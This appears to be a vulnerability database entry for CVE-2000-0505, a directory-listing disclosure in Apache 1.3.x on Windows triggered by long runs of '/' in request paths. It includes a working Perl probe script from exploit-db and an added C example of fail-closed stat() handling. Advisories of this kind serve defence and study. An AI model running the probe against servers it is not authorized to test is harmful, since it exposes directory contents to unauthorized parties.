Apache Web Server (Win32) Root Directory Access Vulnerability

Vulnerability ID: 1105865  Vulnerability type: Other
Published: 2000-05-31  Updated: 2021-06-07
CVE ID: CVE-2000-0505  CNNVD-ID: CNNVD-200005-109
Platform: Windows  CVSS score: 5.0
|Vulnerability Source
https://www.exploit-db.com/exploits/19975


http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-109

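|Vulnerability Details
Apache is a widely used open-source web server. Apache Web Server 1.3.x (Win32) has a flaw in how it handles request paths: a remote attacker can exploit it to obtain directory listing information by requesting a URL that contains a large number of '/' characters.
|Exploit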
source: http://www.securityfocus.com/bid/1284/info

Apache HTTP Server 1.3.x (win32) allows people to get a listing of a directory, if directory listings are enabled in the config, even if an index file is present that would normally be displayed instead. This can be achieved by sending a number of "/" characters appended to an HTTP request to the server (e.g. http://www.host.com///////////////////////////////////////////////////////...). When Apache calls stat() to check whether the index file (index.html, for example) exists, Windows returns an error if the path is too long. Apache incorrectly treats this error as if the file does not exist. The number of "/" characters required depends on the length of the path to the DocumentRoot.

#!/usr/bin/perl

use LWP::Simple;
use strict;

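my $host = shift() || die "usage:  $0 [hostname]\n";
my $cnt;
my $data;
my $odata;
my $i;

# Baseline: the page normally served for the DocumentRoot (the index file).
$odata = get("http://$host/");
if (!defined($odata) || $odata eq "")
{
    die "no response from server:  $host\n";
}
# Append an increasing number of "/" characters until the response changes.
for ($i = 2; $i < 4096; $i++)
{
    print "Trying $i...\n";
    $data = get("http://$host" . ("/" x $i));
    # get() returns undef on a failed request; that is not a changed response.
    next unless defined($data);
    if ($data ne $odata)
    {
        print "/ = $i\n\n$data\n\n";
        exit;
    }
}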
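
The root cause described above (a stat() failure of any kind being read as "the index file does not exist") next to a fail-closed check, as an added example that is not Apache's code or part of the original advisory. It assumes a POSIX system, where an over-long path makes stat() fail with ENAMETOOLONG, as a stand-in for the Win32 behaviour; the function names and the file name are hypothetical.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

enum decision { SERVE_INDEX, LIST_DIRECTORY, DENY_REQUEST };

/* Flawed pattern from the advisory: every stat() failure means "no index". */
enum decision decide_flawed(const char *index_path)
{
    struct stat st;
    if (stat(index_path, &st) == 0 && S_ISREG(st.st_mode))
        return SERVE_INDEX;
    return LIST_DIRECTORY;
}

/* Fail closed: only "file not found" errors permit the listing fallback. */
enum decision decide_strict(const char *index_path)
{
    struct stat st;
    if (stat(index_path, &st) == 0)
        return S_ISREG(st.st_mode) ? SERVE_INDEX : DENY_REQUEST;
    if (errno == ENOENT || errno == ENOTDIR)
        return LIST_DIRECTORY;   /* index file is really absent */
    return DENY_REQUEST;         /* ENAMETOOLONG, EACCES, ...: state unknown */
}

/* Constructed input: "." + `slashes` '/' characters + a hypothetical file name. */
const char *padded_path(size_t slashes)
{
    static char buf[8192];
    if (slashes > sizeof buf - 64) slashes = sizeof buf - 64;
    buf[0] = '.';
    memset(buf + 1, '/', slashes);
    strcpy(buf + 1 + slashes, "constructed-missing-index.html");
    return buf;
}

int main(void)
{
    static const char *name[] = { "serve index", "list directory", "deny" };
    size_t n[] = { 1, 5000 };   /* 5000 exceeds PATH_MAX on common POSIX systems */
    for (int i = 0; i < 2; i++) {
        const char *p = padded_path(n[i]);
        printf("%zu slashes: flawed=%s strict=%s\n", n[i],
               name[decide_flawed(p)], name[decide_strict(p)]);
    }
    return 0;
}
```

The flawed check returns the same answer for a missing file and for an over-long path, while the strict check falls back to a listing only when the file is confirmed absent.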

|References

Source: BUGTRAQ

Name: 20000603Re:IBMHTTPSERVER/APACHE

Link: http://www.securityfocus.com/templates/archive.pike?list=1&[email protected]

Source: BID

Name: 1284

Link: http://www.securityfocus.com/bid/1284

Source: XF

Name: ibm-http-file-retrieve

Link: http://xforce.iss.net/static/4575.php

Source: NSFOCUS

Name: 7758

Link: http://www.nsfocus.net/vulndb/7758